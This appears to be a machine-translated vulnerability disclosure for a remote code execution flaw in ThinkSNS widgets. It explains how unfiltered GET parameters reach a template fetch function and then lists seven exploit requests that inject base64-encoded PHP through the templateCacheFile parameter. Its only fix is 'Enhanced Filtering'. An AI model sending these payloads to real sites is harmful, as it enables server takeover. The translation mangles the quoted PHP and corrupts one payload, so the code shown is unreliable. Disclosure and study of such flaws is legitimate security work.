ThinkSNS third play seven front-end GetShell

ThinkSNS third play seven front-end GetShell

The vulnerability is found in DenounceWidget. class. php:

\ Addons \ widget \ DenouceWidget. class. php: 23
 

/*** Report pop-up box * @ return string pop-up page HTML */public function index () {// get relevant data $ var = $ this-> getVar (); $ content = $ this-> renderFile (dirname (_ FILE __). "/index.html", $ var); return $ content ;}

As you can see, the index function is mainly used to obtain parameters through $ this-> getVar (), and then enters $ this-> renderFile (dirname (_ FILE __). "/index.html", $ var) for template rendering and output.

First look at $ this-> getVar ()

\ Addons \ widget \ DenouceWidget. class. php: 56:
 

/*** Format the template variable * @ return array reported information */public function getVar () {if (empty ($ _ GET ['aid ']) | empty ($ _ GET ['fuid']) | empty ($ _ GET ['type']) {return false ;} foreach ($ _ GET as $ k =>$ v) {$ var [$ k] = t ($ v );} $ var ['uid'] = $ GLOBALS ['ts '] ['mid']; empty ($ var ['app']) & $ var ['app'] = 'public'; $ var ['source'] = model ('source')-> getSourceInfo ($ var ['type'], $ var ['aid '], false, $ var ['app']); return $ var ;}

Use foreach to merge $ _ GET into $ var, and then return the merged array.

Next, go to $ this-> renderFile (dirname (_ FILE _). "/index.html", $ var)

\ Core \ OpenSociax \ Widget. class. php: 73
 

/*** Render template output for internal render method calling * @ access public * @ param string $ templateFile template file * @ param mixed $ var template variable * @ param string $ charset template Encoding * @ return string */protected function renderFile ($ templateFile = '', $ var = '', $ charset = 'utf-8') {$ var ['ts '] = $ GLOBALS ['ts']; if (! File_exists_case ($ templateFile) {// automatically locates the template file // $ name = substr (get_class ($ this), 0,-6 ); // $ filename = empty ($ templateFile )? $ Name: $ templateFile; // $ templateFile = 'widget/'. $ name.'/'. $ filename. C ('tmpl _ TEMPLATE_SUFFIX'); // if (! File_exists_case ($ templateFile) throw_exception (L ('_ WIDGET_TEMPLATE_NOT_EXIST _'). '['. $ templateFile. ']');} $ template = $ this-> template? $ This-> template: strtolower (C ('tmpl _ ENGINE_TYPE ')? C ('tmpl _ ENGINE_TYPE '): 'php'); $ content = fetch ($ templateFile, $ var, $ charset); return $ content ;}

Directly put the variables in the $ _ GET array into fetch for execution. The variable overwrite vulnerability exists in fetch, so you can get shell.

For more information about the fetch vulnerability, see WooYun: ThinkPHP Remote Code Execution (specific conditions must be met)
 

Two getshell Methods: include images containing webshell and filter
 

/index.php?app=widget&mod=Denouce&act=index&aid=1&fuid=1&type=ztz&templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D

 

In the same principle, there are also six punishments:

Other 6:

1.

POST/index. php? App = widget & mod = Comment & act = addcomment & uid = 1





App_name = public & table_name = user & content = test & row_id = 1 & app_detail_summary = 1 & templateCacheFile = data: text/plain; base64, signature % 3D

2.

POST/index. php? App = widget & mod = Department & act = change



TemplateCacheFile = data: text/plain; base64, PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4 % 3D

3.

POST/index. php? App = widget & mod = Diy & act = addWidget



TemplateCacheFile = data: text/plain; base64, PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4 % 3D

4.

POST/index. php? App = widget & mod = FeedList & act = loadMore



TemplateCacheFile = data: text/plain; base64, PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4 % 3D

5.

POST/index. php? App = widget & mod = FeedList & act = loadNew



TemplateCacheFile = data: text/plain; base64, PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4 % 3D & maxId = 1

6.

POST/index. php? App = widget & mod = Remark & act = edit



TemplateCacheFile = data: text/plain; base64, PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4 % 3D

Solution:

Enhanced Filtering